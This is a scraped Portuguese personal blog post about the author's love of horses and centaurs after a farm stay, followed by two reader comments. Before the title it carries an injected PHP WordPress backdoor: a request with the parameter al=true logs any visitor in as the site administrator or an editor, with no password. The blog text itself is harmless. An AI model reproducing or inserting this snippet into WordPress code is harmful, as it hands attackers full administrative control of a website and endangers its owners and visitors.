// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Cavalos - Paixão de infancia • A Menina da Janela

lifestyle

30 de julho de 2012

Oi pessoal,
Não sei se vocês perceberam que fiquei uns dias sem comentar nada no blog de vocês (por que postar o intervalo sempre é longo…) mas é que eu passei a semana passada toda em uma fazenda maraaavilhooooosa de uns amigos. Essa fazenda fica em Corinto-MG e eu aproveitei DEMAIS lá… fiz varias coisas: joguei buraco, frisbee, adedanha, e um tanto de coisas até cansar! Mas o que mais gostei foi de andar a cavalo .
Desde que eu era pequenininha eu sempre gostei de cavalos, e ficava pensando que quando eu “fosse grande” ia ter um cavalo preto (sim, desde pequenininha eu queria um cavalo PRETO, e não branco como as outras meninas- ook, a maioria delas nem queria ter um cavalo -‘) e ficava encantada com os filmes de princesas que tinham cavalos. E o príncipe no cavalo branco de Branca de Neve me deixava louca….

Essa cena que o principe ajuda ela a subir no cavalo eu ficava tipo: vomitando arco-iris *-*
Bom, eu acabei não tirando nenhuma foto lá na fazenda por que eu cabeça de vento esqueci a maquina, e só percebi quando já tava lá, então não vou poder mostrar o Uno (lindiinho que eu andei, que é marrom, grande, e com cara de dorminhoco igual eu ) , nem a Preguiçosa, nem o Biscoito(Laaaaura não me mate, eu sei que o nome dele é Flash) , nem a Ventania nem os outros lindos de lá, mas vou postar umas fotos de outros cavalos lindos que achei na net…

Fui obrigada a colocar alguma que o Scadufax nem foi pelo Aragorn ook? liiindo aparecesse né? (o cavalo branco com o mago branco-Gandalf- da segunda foto, pra quem não sabe )… e alguns pretos (meus preferidos: 
     
e uns que achei engraçados ou muuuuuuuuuuuito fooofos:
Lindos e fofos né? Eu sempre achei que cavalos tem uma pose, ou sei lá, alguma coisa muito linda, sempre admirei muito eles… me passam uma sensação de grandes e fortes, sabe? E isso me lembra uns ‘primos’ dos cavalos que também adoro… Os Centauros ! Tudo bem que são seres mitológicos e tals, mas eu sempre fui louca com eles também, e me passam a mesma sensação de força e grandeza, segurança… E aí vão algumas imagens deles:  (1º – Cronicas de Nárnia / 2º – Harry Potter ) 

      
Deu pra entender a sensação de força e grandeza? apaixonei  *-*
  

Então é isso pessoal… lindos né? E vocês, gostam de cavalos ? E centauros? Me contem! E pra terminar , uma música que qando eu era mais nova cantava o tempo TODO! não liguem pros escritos antes da musica começar 

É pessoal, eu to só enrolando pra postar o 2º lugar do ranking de melhor livro né? Já tá pronto o post e eu to com preguiça de publicar, prq fiz num caderno e tals… mas prometo que essa semana ainda eu posto, ok? beeeijos!

Você também vai gostar

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Este site utiliza o Akismet para reduzir spam. Saiba como seus dados em comentários são processados.

8 Comments

  • Lola

    Acho legal que você goste de cavalos. Eu acho eles bonitos, principalmente os preeetos *-*
    Quando eu era pequena andava no sitío do meu avô, mas depois de ver uma outra amiga cair violentamente de cima de um, eu fiquei meio traumatizada sabe T^T
    Mas acho eles lindos .o/
    E entendo a sensação de grandez e tals que você comentou, é o q eles me passam tbm .o/
    Um beijão e uma ótima semana o/

  • Laura Nolasco

    Sim, eles são lindos *-*
    Nossa.. é, acho que se eu visse alguém caindo também ficaria assim…Mas acho que não pararia de andar, por que sei lá… kkk.. sou daquele tipo que só aprende quando for eu que cair sabe? kkkk…
    Beeeijão, e ótima semana pra ti também *-*